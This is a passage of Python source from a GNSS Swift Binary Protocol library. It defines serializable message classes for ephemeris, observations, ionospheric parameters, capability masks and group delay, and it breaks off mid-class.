      Polynomial clock correction coefficient (rate of clock drift)
    toe_tow : double
      Time of week
    toe_wn : int
      Week number
    toc_tow : double
      Clock reference time of week
    toc_wn : int
      Clock reference week number
    valid : int
      Is valid?
    healthy : int
      Satellite is healthy?
    prn : int
      PRN being tracked
    iode : int
      Issue of ephemeris data
    sender : int
      Optional sender ID, defaults to SENDER_ID (see sbp/msg.py).
    """
    # Payload codec: little-endian field order defines the wire format.
    _parser = construct.Struct(
        'tgd' / construct.Float64l,
        'c_rs' / construct.Float64l,
        'c_rc' / construct.Float64l,
        'c_uc' / construct.Float64l,
        'c_us' / construct.Float64l,
        'c_ic' / construct.Float64l,
        'c_is' / construct.Float64l,
        'dn' / construct.Float64l,
        'm0' / construct.Float64l,
        'ecc' / construct.Float64l,
        'sqrta' / construct.Float64l,
        'omega0' / construct.Float64l,
        'omegadot' / construct.Float64l,
        'w' / construct.Float64l,
        'inc' / construct.Float64l,
        'inc_dot' / construct.Float64l,
        'af0' / construct.Float64l,
        'af1' / construct.Float64l,
        'af2' / construct.Float64l,
        'toe_tow' / construct.Float64l,
        'toe_wn' / construct.Int16ul,
        'toc_tow' / construct.Float64l,
        'toc_wn' / construct.Int16ul,
        'valid' / construct.Int8ul,
        'healthy' / construct.Int8ul,
        'prn' / construct.Int8ul,
        'iode' / construct.Int8ul,)
    # Order mirrors _parser so from_binary/to_binary round-trip by name.
    __slots__ = [
        'tgd',
        'c_rs',
        'c_rc',
        'c_uc',
        'c_us',
        'c_ic',
        'c_is',
        'dn',
        'm0',
        'ecc',
        'sqrta',
        'omega0',
        'omegadot',
        'w',
        'inc',
        'inc_dot',
        'af0',
        'af1',
        'af2',
        'toe_tow',
        'toe_wn',
        'toc_tow',
        'toc_wn',
        'valid',
        'healthy',
        'prn',
        'iode',
    ]

    def __init__(self, sbp=None, **kwargs):
        """Wrap a parsed SBP frame, or build the message from field kwargs."""
        if sbp:
            # Inherit framing from the parent frame, then decode its payload.
            super(MsgEphemerisDepB, self).__init__(sbp.msg_type, sbp.sender,
                                                   sbp.length, sbp.payload,
                                                   sbp.crc)
            self.from_binary(sbp.payload)
        else:
            super(MsgEphemerisDepB, self).__init__()
            self.msg_type = SBP_MSG_EPHEMERIS_DEP_B
            self.sender = kwargs.pop('sender', SENDER_ID)
            # kwargs.pop without a default raises KeyError for missing fields.
            self.tgd = kwargs.pop('tgd')
            self.c_rs = kwargs.pop('c_rs')
            self.c_rc = kwargs.pop('c_rc')
            self.c_uc = kwargs.pop('c_uc')
            self.c_us = kwargs.pop('c_us')
            self.c_ic = kwargs.pop('c_ic')
            self.c_is = kwargs.pop('c_is')
            self.dn = kwargs.pop('dn')
            self.m0 = kwargs.pop('m0')
            self.ecc = kwargs.pop('ecc')
            self.sqrta = kwargs.pop('sqrta')
            self.omega0 = kwargs.pop('omega0')
            self.omegadot = kwargs.pop('omegadot')
            self.w = kwargs.pop('w')
            self.inc = kwargs.pop('inc')
            self.inc_dot = kwargs.pop('inc_dot')
            self.af0 = kwargs.pop('af0')
            self.af1 = kwargs.pop('af1')
            self.af2 = kwargs.pop('af2')
            self.toe_tow = kwargs.pop('toe_tow')
            self.toe_wn = kwargs.pop('toe_wn')
            self.toc_tow = kwargs.pop('toc_tow')
            self.toc_wn = kwargs.pop('toc_wn')
            self.valid = kwargs.pop('valid')
            self.healthy = kwargs.pop('healthy')
            self.prn = kwargs.pop('prn')
            self.iode = kwargs.pop('iode')

    def __repr__(self):
        """Return a human-readable dump of the message fields (via fmt_repr)."""
        return fmt_repr(self)

    @staticmethod
    def from_json(s):
        """Given a JSON-encoded string s, build a message object.
        """
        d = json.loads(s)
        return MsgEphemerisDepB.from_json_dict(d)

    @staticmethod
    def from_json_dict(d):
        """Build a message object from an already-decoded JSON dict ``d``."""
        sbp = SBP.from_json_dict(d)
        return MsgEphemerisDepB(sbp, **d)

    def from_binary(self, d):
        """Given a binary payload d, update the appropriate payload fields of
        the message.
        """
        p = MsgEphemerisDepB._parser.parse(d)
        # Copy every declared payload field from the parsed container to self.
        for n in self.__class__.__slots__:
            setattr(self, n, getattr(p, n))

    def to_binary(self):
        """Produce a framed/packed SBP message.
        """
        c = containerize(exclude_fields(self))
        self.payload = MsgEphemerisDepB._parser.build(c)
        return self.pack()

    def into_buffer(self, buf, offset):
        """Produce a framed/packed SBP message into the provided buffer and offset.
        """
        self.payload = containerize(exclude_fields(self))
        self.parser = MsgEphemerisDepB._parser
        self.stream_payload.reset(buf, offset)
        return self.pack_into(buf, offset, self._build_payload)

    def to_json_dict(self):
        """Return a JSON-serializable dict of the framed message plus fields."""
        self.to_binary()  # refresh self.payload so the frame dict is current
        d = super(MsgEphemerisDepB, self).to_json_dict()
        j = walk_json_dict(exclude_fields(self))
        d.update(j)
        return d
SBP_MSG_EPHEMERIS_DEP_C = 0x0047


class MsgEphemerisDepC(SBP):
    """SBP class for message MSG_EPHEMERIS_DEP_C (0x0047).

    You can have MSG_EPHEMERIS_DEP_C inherit its fields directly
    from an inherited SBP object, or construct it inline using a dict
    of its fields.

    The ephemeris message returns a set of satellite orbit
    parameters that is used to calculate GPS satellite position,
    velocity, and clock offset. Please see the Navstar GPS
    Space Segment/Navigation user interfaces (ICD-GPS-200, Table
    20-III) for more details.

    Parameters
    ----------
    sbp : SBP
      SBP parent object to inherit from.
    tgd : double
      Group delay differential between L1 and L2
    c_rs : double
      Amplitude of the sine harmonic correction term to the orbit radius
    c_rc : double
      Amplitude of the cosine harmonic correction term to the orbit radius
    c_uc : double
      Amplitude of the cosine harmonic correction term to the argument of latitude
    c_us : double
      Amplitude of the sine harmonic correction term to the argument of latitude
    c_ic : double
      Amplitude of the cosine harmonic correction term to the angle of inclination
    c_is : double
      Amplitude of the sine harmonic correction term to the angle of inclination
    dn : double
      Mean motion difference
    m0 : double
      Mean anomaly at reference time
    ecc : double
      Eccentricity of satellite orbit
    sqrta : double
      Square root of the semi-major axis of orbit
    omega0 : double
      Longitude of ascending node of orbit plane at weekly epoch
    omegadot : double
      Rate of right ascension
    w : double
      Argument of perigee
    inc : double
      Inclination
    inc_dot : double
      Inclination first derivative
    af0 : double
      Polynomial clock correction coefficient (clock bias)
    af1 : double
      Polynomial clock correction coefficient (clock drift)
    af2 : double
      Polynomial clock correction coefficient (rate of clock drift)
    toe_tow : double
      Time of week
    toe_wn : int
      Week number
    toc_tow : double
      Clock reference time of week
    toc_wn : int
      Clock reference week number
    valid : int
      Is valid?
    healthy : int
      Satellite is healthy?
    sid : GnssSignalDep
      GNSS signal identifier
    iode : int
      Issue of ephemeris data
    iodc : int
      Issue of clock data
    reserved : int
      Reserved field
    sender : int
      Optional sender ID, defaults to SENDER_ID (see sbp/msg.py).
    """
    # Payload codec: little-endian field order defines the wire format.
    _parser = construct.Struct(
        'tgd' / construct.Float64l,
        'c_rs' / construct.Float64l,
        'c_rc' / construct.Float64l,
        'c_uc' / construct.Float64l,
        'c_us' / construct.Float64l,
        'c_ic' / construct.Float64l,
        'c_is' / construct.Float64l,
        'dn' / construct.Float64l,
        'm0' / construct.Float64l,
        'ecc' / construct.Float64l,
        'sqrta' / construct.Float64l,
        'omega0' / construct.Float64l,
        'omegadot' / construct.Float64l,
        'w' / construct.Float64l,
        'inc' / construct.Float64l,
        'inc_dot' / construct.Float64l,
        'af0' / construct.Float64l,
        'af1' / construct.Float64l,
        'af2' / construct.Float64l,
        'toe_tow' / construct.Float64l,
        'toe_wn' / construct.Int16ul,
        'toc_tow' / construct.Float64l,
        'toc_wn' / construct.Int16ul,
        'valid' / construct.Int8ul,
        'healthy' / construct.Int8ul,
        'sid' / construct.Struct(GnssSignalDep._parser),
        'iode' / construct.Int8ul,
        'iodc' / construct.Int16ul,
        'reserved' / construct.Int32ul,)
    # Order mirrors _parser so from_binary/to_binary round-trip by name.
    __slots__ = [
        'tgd',
        'c_rs',
        'c_rc',
        'c_uc',
        'c_us',
        'c_ic',
        'c_is',
        'dn',
        'm0',
        'ecc',
        'sqrta',
        'omega0',
        'omegadot',
        'w',
        'inc',
        'inc_dot',
        'af0',
        'af1',
        'af2',
        'toe_tow',
        'toe_wn',
        'toc_tow',
        'toc_wn',
        'valid',
        'healthy',
        'sid',
        'iode',
        'iodc',
        'reserved',
    ]

    def __init__(self, sbp=None, **kwargs):
        """Wrap a parsed SBP frame, or build the message from field kwargs."""
        if sbp:
            # Inherit framing from the parent frame, then decode its payload.
            super(MsgEphemerisDepC, self).__init__(sbp.msg_type, sbp.sender,
                                                   sbp.length, sbp.payload,
                                                   sbp.crc)
            self.from_binary(sbp.payload)
        else:
            super(MsgEphemerisDepC, self).__init__()
            self.msg_type = SBP_MSG_EPHEMERIS_DEP_C
            self.sender = kwargs.pop('sender', SENDER_ID)
            # kwargs.pop without a default raises KeyError for missing fields.
            self.tgd = kwargs.pop('tgd')
            self.c_rs = kwargs.pop('c_rs')
            self.c_rc = kwargs.pop('c_rc')
            self.c_uc = kwargs.pop('c_uc')
            self.c_us = kwargs.pop('c_us')
            self.c_ic = kwargs.pop('c_ic')
            self.c_is = kwargs.pop('c_is')
            self.dn = kwargs.pop('dn')
            self.m0 = kwargs.pop('m0')
            self.ecc = kwargs.pop('ecc')
            self.sqrta = kwargs.pop('sqrta')
            self.omega0 = kwargs.pop('omega0')
            self.omegadot = kwargs.pop('omegadot')
            self.w = kwargs.pop('w')
            self.inc = kwargs.pop('inc')
            self.inc_dot = kwargs.pop('inc_dot')
            self.af0 = kwargs.pop('af0')
            self.af1 = kwargs.pop('af1')
            self.af2 = kwargs.pop('af2')
            self.toe_tow = kwargs.pop('toe_tow')
            self.toe_wn = kwargs.pop('toe_wn')
            self.toc_tow = kwargs.pop('toc_tow')
            self.toc_wn = kwargs.pop('toc_wn')
            self.valid = kwargs.pop('valid')
            self.healthy = kwargs.pop('healthy')
            self.sid = kwargs.pop('sid')
            self.iode = kwargs.pop('iode')
            self.iodc = kwargs.pop('iodc')
            self.reserved = kwargs.pop('reserved')

    def __repr__(self):
        """Return a human-readable dump of the message fields (via fmt_repr)."""
        return fmt_repr(self)

    @staticmethod
    def from_json(s):
        """Given a JSON-encoded string s, build a message object.
        """
        d = json.loads(s)
        return MsgEphemerisDepC.from_json_dict(d)

    @staticmethod
    def from_json_dict(d):
        """Build a message object from an already-decoded JSON dict ``d``."""
        sbp = SBP.from_json_dict(d)
        return MsgEphemerisDepC(sbp, **d)

    def from_binary(self, d):
        """Given a binary payload d, update the appropriate payload fields of
        the message.
        """
        p = MsgEphemerisDepC._parser.parse(d)
        # Copy every declared payload field from the parsed container to self.
        for n in self.__class__.__slots__:
            setattr(self, n, getattr(p, n))

    def to_binary(self):
        """Produce a framed/packed SBP message.
        """
        c = containerize(exclude_fields(self))
        self.payload = MsgEphemerisDepC._parser.build(c)
        return self.pack()

    def into_buffer(self, buf, offset):
        """Produce a framed/packed SBP message into the provided buffer and offset.
        """
        self.payload = containerize(exclude_fields(self))
        self.parser = MsgEphemerisDepC._parser
        self.stream_payload.reset(buf, offset)
        return self.pack_into(buf, offset, self._build_payload)

    def to_json_dict(self):
        """Return a JSON-serializable dict of the framed message plus fields."""
        self.to_binary()  # refresh self.payload so the frame dict is current
        d = super(MsgEphemerisDepC, self).to_json_dict()
        j = walk_json_dict(exclude_fields(self))
        d.update(j)
        return d
SBP_MSG_OBS_DEP_A = 0x0045


class MsgObsDepA(SBP):
    """SBP class for message MSG_OBS_DEP_A (0x0045).

    You can have MSG_OBS_DEP_A inherit its fields directly
    from an inherited SBP object, or construct it inline using a dict
    of its fields.

    Deprecated.

    Parameters
    ----------
    sbp : SBP
      SBP parent object to inherit from.
    header : ObservationHeaderDep
      Header of a GPS observation message
    obs : array
      Pseudorange and carrier phase observation for a
      satellite being tracked.
    sender : int
      Optional sender ID, defaults to SENDER_ID (see sbp/msg.py).
    """
    # Payload codec: a fixed header followed by as many observation records
    # as fit in the payload (GreedyRange consumes to end of payload).
    _parser = construct.Struct(
        'header' / construct.Struct(ObservationHeaderDep._parser),
        construct.GreedyRange('obs' / construct.Struct(PackedObsContentDepA._parser)),)
    # Order mirrors _parser so from_binary/to_binary round-trip by name.
    __slots__ = [
        'header',
        'obs',
    ]

    def __init__(self, sbp=None, **kwargs):
        """Wrap a parsed SBP frame, or build the message from field kwargs."""
        if sbp:
            # Inherit framing from the parent frame, then decode its payload.
            super(MsgObsDepA, self).__init__(sbp.msg_type, sbp.sender,
                                             sbp.length, sbp.payload, sbp.crc)
            self.from_binary(sbp.payload)
        else:
            super(MsgObsDepA, self).__init__()
            self.msg_type = SBP_MSG_OBS_DEP_A
            self.sender = kwargs.pop('sender', SENDER_ID)
            # kwargs.pop without a default raises KeyError for missing fields.
            self.header = kwargs.pop('header')
            self.obs = kwargs.pop('obs')

    def __repr__(self):
        """Return a human-readable dump of the message fields (via fmt_repr)."""
        return fmt_repr(self)

    @staticmethod
    def from_json(s):
        """Given a JSON-encoded string s, build a message object.
        """
        d = json.loads(s)
        return MsgObsDepA.from_json_dict(d)

    @staticmethod
    def from_json_dict(d):
        """Build a message object from an already-decoded JSON dict ``d``."""
        sbp = SBP.from_json_dict(d)
        return MsgObsDepA(sbp, **d)

    def from_binary(self, d):
        """Given a binary payload d, update the appropriate payload fields of
        the message.
        """
        p = MsgObsDepA._parser.parse(d)
        # Copy every declared payload field from the parsed container to self.
        for n in self.__class__.__slots__:
            setattr(self, n, getattr(p, n))

    def to_binary(self):
        """Produce a framed/packed SBP message.
        """
        c = containerize(exclude_fields(self))
        self.payload = MsgObsDepA._parser.build(c)
        return self.pack()

    def into_buffer(self, buf, offset):
        """Produce a framed/packed SBP message into the provided buffer and offset.
        """
        self.payload = containerize(exclude_fields(self))
        self.parser = MsgObsDepA._parser
        self.stream_payload.reset(buf, offset)
        return self.pack_into(buf, offset, self._build_payload)

    def to_json_dict(self):
        """Return a JSON-serializable dict of the framed message plus fields."""
        self.to_binary()  # refresh self.payload so the frame dict is current
        d = super(MsgObsDepA, self).to_json_dict()
        j = walk_json_dict(exclude_fields(self))
        d.update(j)
        return d
SBP_MSG_OBS_DEP_B = 0x0043


class MsgObsDepB(SBP):
    """SBP class for message MSG_OBS_DEP_B (0x0043).

    You can have MSG_OBS_DEP_B inherit its fields directly
    from an inherited SBP object, or construct it inline using a dict
    of its fields.

    This observation message has been deprecated in favor of
    observations that are more interoperable. This message
    should be used for observations referenced to
    a nominal pseudorange which are not interoperable with
    most 3rd party GNSS receivers or typical RTCMv3
    observations.

    Parameters
    ----------
    sbp : SBP
      SBP parent object to inherit from.
    header : ObservationHeaderDep
      Header of a GPS observation message
    obs : array
      Pseudorange and carrier phase observation for a
      satellite being tracked.
    sender : int
      Optional sender ID, defaults to SENDER_ID (see sbp/msg.py).
    """
    # Payload codec: a fixed header followed by as many observation records
    # as fit in the payload (GreedyRange consumes to end of payload).
    _parser = construct.Struct(
        'header' / construct.Struct(ObservationHeaderDep._parser),
        construct.GreedyRange('obs' / construct.Struct(PackedObsContentDepB._parser)),)
    # Order mirrors _parser so from_binary/to_binary round-trip by name.
    __slots__ = [
        'header',
        'obs',
    ]

    def __init__(self, sbp=None, **kwargs):
        """Wrap a parsed SBP frame, or build the message from field kwargs."""
        if sbp:
            # Inherit framing from the parent frame, then decode its payload.
            super(MsgObsDepB, self).__init__(sbp.msg_type, sbp.sender,
                                             sbp.length, sbp.payload, sbp.crc)
            self.from_binary(sbp.payload)
        else:
            super(MsgObsDepB, self).__init__()
            self.msg_type = SBP_MSG_OBS_DEP_B
            self.sender = kwargs.pop('sender', SENDER_ID)
            # kwargs.pop without a default raises KeyError for missing fields.
            self.header = kwargs.pop('header')
            self.obs = kwargs.pop('obs')

    def __repr__(self):
        """Return a human-readable dump of the message fields (via fmt_repr)."""
        return fmt_repr(self)

    @staticmethod
    def from_json(s):
        """Given a JSON-encoded string s, build a message object.
        """
        d = json.loads(s)
        return MsgObsDepB.from_json_dict(d)

    @staticmethod
    def from_json_dict(d):
        """Build a message object from an already-decoded JSON dict ``d``."""
        sbp = SBP.from_json_dict(d)
        return MsgObsDepB(sbp, **d)

    def from_binary(self, d):
        """Given a binary payload d, update the appropriate payload fields of
        the message.
        """
        p = MsgObsDepB._parser.parse(d)
        # Copy every declared payload field from the parsed container to self.
        for n in self.__class__.__slots__:
            setattr(self, n, getattr(p, n))

    def to_binary(self):
        """Produce a framed/packed SBP message.
        """
        c = containerize(exclude_fields(self))
        self.payload = MsgObsDepB._parser.build(c)
        return self.pack()

    def into_buffer(self, buf, offset):
        """Produce a framed/packed SBP message into the provided buffer and offset.
        """
        self.payload = containerize(exclude_fields(self))
        self.parser = MsgObsDepB._parser
        self.stream_payload.reset(buf, offset)
        return self.pack_into(buf, offset, self._build_payload)

    def to_json_dict(self):
        """Return a JSON-serializable dict of the framed message plus fields."""
        self.to_binary()  # refresh self.payload so the frame dict is current
        d = super(MsgObsDepB, self).to_json_dict()
        j = walk_json_dict(exclude_fields(self))
        d.update(j)
        return d
SBP_MSG_OBS_DEP_C = 0x0049


class MsgObsDepC(SBP):
    """SBP class for message MSG_OBS_DEP_C (0x0049).

    You can have MSG_OBS_DEP_C inherit its fields directly
    from an inherited SBP object, or construct it inline using a dict
    of its fields.

    The GPS observations message reports all the raw pseudorange and
    carrier phase observations for the satellites being tracked by
    the device. Carrier phase observation here is represented as a
    40-bit fixed point number with Q32.8 layout (i.e. 32-bits of
    whole cycles and 8-bits of fractional cycles). The observations
    are interoperable with 3rd party receivers and conform
    with typical RTCMv3 GNSS observations.

    Parameters
    ----------
    sbp : SBP
      SBP parent object to inherit from.
    header : ObservationHeaderDep
      Header of a GPS observation message
    obs : array
      Pseudorange and carrier phase observation for a
      satellite being tracked.
    sender : int
      Optional sender ID, defaults to SENDER_ID (see sbp/msg.py).
    """
    # Payload codec: a fixed header followed by as many observation records
    # as fit in the payload (GreedyRange consumes to end of payload).
    _parser = construct.Struct(
        'header' / construct.Struct(ObservationHeaderDep._parser),
        construct.GreedyRange('obs' / construct.Struct(PackedObsContentDepC._parser)),)
    # Order mirrors _parser so from_binary/to_binary round-trip by name.
    __slots__ = [
        'header',
        'obs',
    ]

    def __init__(self, sbp=None, **kwargs):
        """Wrap a parsed SBP frame, or build the message from field kwargs."""
        if sbp:
            # Inherit framing from the parent frame, then decode its payload.
            super(MsgObsDepC, self).__init__(sbp.msg_type, sbp.sender,
                                             sbp.length, sbp.payload, sbp.crc)
            self.from_binary(sbp.payload)
        else:
            super(MsgObsDepC, self).__init__()
            self.msg_type = SBP_MSG_OBS_DEP_C
            self.sender = kwargs.pop('sender', SENDER_ID)
            # kwargs.pop without a default raises KeyError for missing fields.
            self.header = kwargs.pop('header')
            self.obs = kwargs.pop('obs')

    def __repr__(self):
        """Return a human-readable dump of the message fields (via fmt_repr)."""
        return fmt_repr(self)

    @staticmethod
    def from_json(s):
        """Given a JSON-encoded string s, build a message object.
        """
        d = json.loads(s)
        return MsgObsDepC.from_json_dict(d)

    @staticmethod
    def from_json_dict(d):
        """Build a message object from an already-decoded JSON dict ``d``."""
        sbp = SBP.from_json_dict(d)
        return MsgObsDepC(sbp, **d)

    def from_binary(self, d):
        """Given a binary payload d, update the appropriate payload fields of
        the message.
        """
        p = MsgObsDepC._parser.parse(d)
        # Copy every declared payload field from the parsed container to self.
        for n in self.__class__.__slots__:
            setattr(self, n, getattr(p, n))

    def to_binary(self):
        """Produce a framed/packed SBP message.
        """
        c = containerize(exclude_fields(self))
        self.payload = MsgObsDepC._parser.build(c)
        return self.pack()

    def into_buffer(self, buf, offset):
        """Produce a framed/packed SBP message into the provided buffer and offset.
        """
        self.payload = containerize(exclude_fields(self))
        self.parser = MsgObsDepC._parser
        self.stream_payload.reset(buf, offset)
        return self.pack_into(buf, offset, self._build_payload)

    def to_json_dict(self):
        """Return a JSON-serializable dict of the framed message plus fields."""
        self.to_binary()  # refresh self.payload so the frame dict is current
        d = super(MsgObsDepC, self).to_json_dict()
        j = walk_json_dict(exclude_fields(self))
        d.update(j)
        return d
SBP_MSG_IONO = 0x0090


class MsgIono(SBP):
    """SBP class for message MSG_IONO (0x0090).

    You can have MSG_IONO inherit its fields directly
    from an inherited SBP object, or construct it inline using a dict
    of its fields.

    The ionospheric parameters which allow the "L1 only" or "L2 only" user to
    utilize the ionospheric model for computation of the ionospheric delay.
    Please see ICD-GPS-200 (Chapter 20.3.3.5.1.7) for more details.

    Parameters
    ----------
    sbp : SBP
      SBP parent object to inherit from.
    t_nmct : GPSTimeSec
      Navigation Message Correction Table Validity Time
    a0 : double
    a1 : double
    a2 : double
    a3 : double
    b0 : double
    b1 : double
    b2 : double
    b3 : double
    sender : int
      Optional sender ID, defaults to SENDER_ID (see sbp/msg.py).
    """
    # Payload codec: little-endian field order defines the wire format.
    _parser = construct.Struct(
        't_nmct' / construct.Struct(GPSTimeSec._parser),
        'a0' / construct.Float64l,
        'a1' / construct.Float64l,
        'a2' / construct.Float64l,
        'a3' / construct.Float64l,
        'b0' / construct.Float64l,
        'b1' / construct.Float64l,
        'b2' / construct.Float64l,
        'b3' / construct.Float64l,)
    # Order mirrors _parser so from_binary/to_binary round-trip by name.
    __slots__ = [
        't_nmct',
        'a0',
        'a1',
        'a2',
        'a3',
        'b0',
        'b1',
        'b2',
        'b3',
    ]

    def __init__(self, sbp=None, **kwargs):
        """Wrap a parsed SBP frame, or build the message from field kwargs."""
        if sbp:
            # Inherit framing from the parent frame, then decode its payload.
            super(MsgIono, self).__init__(sbp.msg_type, sbp.sender,
                                          sbp.length, sbp.payload, sbp.crc)
            self.from_binary(sbp.payload)
        else:
            super(MsgIono, self).__init__()
            self.msg_type = SBP_MSG_IONO
            self.sender = kwargs.pop('sender', SENDER_ID)
            # kwargs.pop without a default raises KeyError for missing fields.
            self.t_nmct = kwargs.pop('t_nmct')
            self.a0 = kwargs.pop('a0')
            self.a1 = kwargs.pop('a1')
            self.a2 = kwargs.pop('a2')
            self.a3 = kwargs.pop('a3')
            self.b0 = kwargs.pop('b0')
            self.b1 = kwargs.pop('b1')
            self.b2 = kwargs.pop('b2')
            self.b3 = kwargs.pop('b3')

    def __repr__(self):
        """Return a human-readable dump of the message fields (via fmt_repr)."""
        return fmt_repr(self)

    @staticmethod
    def from_json(s):
        """Given a JSON-encoded string s, build a message object.
        """
        d = json.loads(s)
        return MsgIono.from_json_dict(d)

    @staticmethod
    def from_json_dict(d):
        """Build a message object from an already-decoded JSON dict ``d``."""
        sbp = SBP.from_json_dict(d)
        return MsgIono(sbp, **d)

    def from_binary(self, d):
        """Given a binary payload d, update the appropriate payload fields of
        the message.
        """
        p = MsgIono._parser.parse(d)
        # Copy every declared payload field from the parsed container to self.
        for n in self.__class__.__slots__:
            setattr(self, n, getattr(p, n))

    def to_binary(self):
        """Produce a framed/packed SBP message.
        """
        c = containerize(exclude_fields(self))
        self.payload = MsgIono._parser.build(c)
        return self.pack()

    def into_buffer(self, buf, offset):
        """Produce a framed/packed SBP message into the provided buffer and offset.
        """
        self.payload = containerize(exclude_fields(self))
        self.parser = MsgIono._parser
        self.stream_payload.reset(buf, offset)
        return self.pack_into(buf, offset, self._build_payload)

    def to_json_dict(self):
        """Return a JSON-serializable dict of the framed message plus fields."""
        self.to_binary()  # refresh self.payload so the frame dict is current
        d = super(MsgIono, self).to_json_dict()
        j = walk_json_dict(exclude_fields(self))
        d.update(j)
        return d
SBP_MSG_SV_CONFIGURATION_GPS_DEP = 0x0091
class MsgSvConfigurationGPSDep(SBP):
  """SBP message MSG_SV_CONFIGURATION_GPS_DEP (0x0091).

  Carries the GPS L2C capability mask together with the validity time of
  the Navigation Message Correction Table.  See ICD-GPS-200, Chapter
  20.3.3.5.1.4, for details.  Construct it from a parent `SBP` object
  (fields decoded from its payload) or inline from keyword arguments.

  Parameters
  ----------
  sbp : SBP
    SBP parent object to inherit from.
  t_nmct : GPSTimeSec
    Navigation Message Correction Table Validity Time
  l2c_mask : int
    L2C capability mask, SV32 bit being MSB, SV1 bit being LSB
  sender : int
    Optional sender ID, defaults to SENDER_ID (see sbp/msg.py).

  """
  _parser = construct.Struct(
    't_nmct' / construct.Struct(GPSTimeSec._parser),
    'l2c_mask' / construct.Int32ul,)
  __slots__ = [
    't_nmct',
    'l2c_mask',
  ]

  def __init__(self, sbp=None, **kwargs):
    if sbp:
      super( MsgSvConfigurationGPSDep,
             self).__init__(sbp.msg_type, sbp.sender, sbp.length,
                            sbp.payload, sbp.crc)
      self.from_binary(sbp.payload)
    else:
      super( MsgSvConfigurationGPSDep, self).__init__()
      self.msg_type = SBP_MSG_SV_CONFIGURATION_GPS_DEP
      self.sender = kwargs.pop('sender', SENDER_ID)
      # All payload fields are mandatory; a missing keyword raises KeyError.
      for field in self.__class__.__slots__:
        setattr(self, field, kwargs.pop(field))

  def __repr__(self):
    return fmt_repr(self)

  @staticmethod
  def from_json(s):
    """Decode the JSON-encoded string `s` into a message object."""
    return MsgSvConfigurationGPSDep.from_json_dict(json.loads(s))

  @staticmethod
  def from_json_dict(d):
    """Build a message object from an already-decoded JSON dict."""
    return MsgSvConfigurationGPSDep(SBP.from_json_dict(d), **d)

  def from_binary(self, d):
    """Parse the binary payload `d` and copy each decoded field onto self."""
    parsed = MsgSvConfigurationGPSDep._parser.parse(d)
    for field in self.__class__.__slots__:
      setattr(self, field, getattr(parsed, field))

  def to_binary(self):
    """Serialize the payload fields and return the fully framed message."""
    self.payload = MsgSvConfigurationGPSDep._parser.build(
      containerize(exclude_fields(self)))
    return self.pack()

  def into_buffer(self, buf, offset):
    """Frame/pack this message into `buf` starting at `offset`."""
    self.payload = containerize(exclude_fields(self))
    self.parser = MsgSvConfigurationGPSDep._parser
    self.stream_payload.reset(buf, offset)
    return self.pack_into(buf, offset, self._build_payload)

  def to_json_dict(self):
    """Return a JSON-serializable dict: frame header plus payload fields."""
    self.to_binary()
    d = super( MsgSvConfigurationGPSDep, self).to_json_dict()
    d.update(walk_json_dict(exclude_fields(self)))
    return d
SBP_MSG_GNSS_CAPB = 0x0096
class MsgGnssCapb(SBP):
  """SBP message MSG_GNSS_CAPB (0x0096).

  Carries the GNSS capability masks along with the validity time of the
  Navigation Message Correction Table.  Construct it from a parent `SBP`
  object (fields decoded from its payload) or inline from keyword arguments.

  Parameters
  ----------
  sbp : SBP
    SBP parent object to inherit from.
  t_nmct : GPSTimeSec
    Navigation Message Correction Table Validity Time
  gc : GnssCapb
    GNSS capabilities masks
  sender : int
    Optional sender ID, defaults to SENDER_ID (see sbp/msg.py).

  """
  _parser = construct.Struct(
    't_nmct' / construct.Struct(GPSTimeSec._parser),
    'gc' / construct.Struct(GnssCapb._parser),)
  __slots__ = [
    't_nmct',
    'gc',
  ]

  def __init__(self, sbp=None, **kwargs):
    if sbp:
      super( MsgGnssCapb,
             self).__init__(sbp.msg_type, sbp.sender, sbp.length,
                            sbp.payload, sbp.crc)
      self.from_binary(sbp.payload)
    else:
      super( MsgGnssCapb, self).__init__()
      self.msg_type = SBP_MSG_GNSS_CAPB
      self.sender = kwargs.pop('sender', SENDER_ID)
      # All payload fields are mandatory; a missing keyword raises KeyError.
      for field in self.__class__.__slots__:
        setattr(self, field, kwargs.pop(field))

  def __repr__(self):
    return fmt_repr(self)

  @staticmethod
  def from_json(s):
    """Decode the JSON-encoded string `s` into a message object."""
    return MsgGnssCapb.from_json_dict(json.loads(s))

  @staticmethod
  def from_json_dict(d):
    """Build a message object from an already-decoded JSON dict."""
    return MsgGnssCapb(SBP.from_json_dict(d), **d)

  def from_binary(self, d):
    """Parse the binary payload `d` and copy each decoded field onto self."""
    parsed = MsgGnssCapb._parser.parse(d)
    for field in self.__class__.__slots__:
      setattr(self, field, getattr(parsed, field))

  def to_binary(self):
    """Serialize the payload fields and return the fully framed message."""
    self.payload = MsgGnssCapb._parser.build(
      containerize(exclude_fields(self)))
    return self.pack()

  def into_buffer(self, buf, offset):
    """Frame/pack this message into `buf` starting at `offset`."""
    self.payload = containerize(exclude_fields(self))
    self.parser = MsgGnssCapb._parser
    self.stream_payload.reset(buf, offset)
    return self.pack_into(buf, offset, self._build_payload)

  def to_json_dict(self):
    """Return a JSON-serializable dict: frame header plus payload fields."""
    self.to_binary()
    d = super( MsgGnssCapb, self).to_json_dict()
    d.update(walk_json_dict(exclude_fields(self)))
    return d
SBP_MSG_GROUP_DELAY_DEP_A = 0x0092
class MsgGroupDelayDepA(SBP):
  """SBP message MSG_GROUP_DELAY_DEP_A (0x0092).

  Deprecated group-delay message keyed by PRN.  See ICD-GPS-200
  (30.3.3.3.1.1) for details.  Construct it from a parent `SBP` object
  (fields decoded from its payload) or inline from keyword arguments.

  Parameters
  ----------
  sbp : SBP
    SBP parent object to inherit from.
  t_op : GPSTimeDep
    Data Predict Time of Week
  prn : int
    Satellite number
  valid : int
    bit-field indicating validity of the values,
    LSB indicating tgd validity etc.
    1 = value is valid, 0 = value is not valid.
  tgd : int
  isc_l1ca : int
  isc_l2c : int
  sender : int
    Optional sender ID, defaults to SENDER_ID (see sbp/msg.py).

  """
  _parser = construct.Struct(
    't_op' / construct.Struct(GPSTimeDep._parser),
    'prn' / construct.Int8ul,
    'valid' / construct.Int8ul,
    'tgd' / construct.Int16sl,
    'isc_l1ca' / construct.Int16sl,
    'isc_l2c' / construct.Int16sl,)
  __slots__ = [
    't_op',
    'prn',
    'valid',
    'tgd',
    'isc_l1ca',
    'isc_l2c',
  ]

  def __init__(self, sbp=None, **kwargs):
    if sbp:
      super( MsgGroupDelayDepA,
             self).__init__(sbp.msg_type, sbp.sender, sbp.length,
                            sbp.payload, sbp.crc)
      self.from_binary(sbp.payload)
    else:
      super( MsgGroupDelayDepA, self).__init__()
      self.msg_type = SBP_MSG_GROUP_DELAY_DEP_A
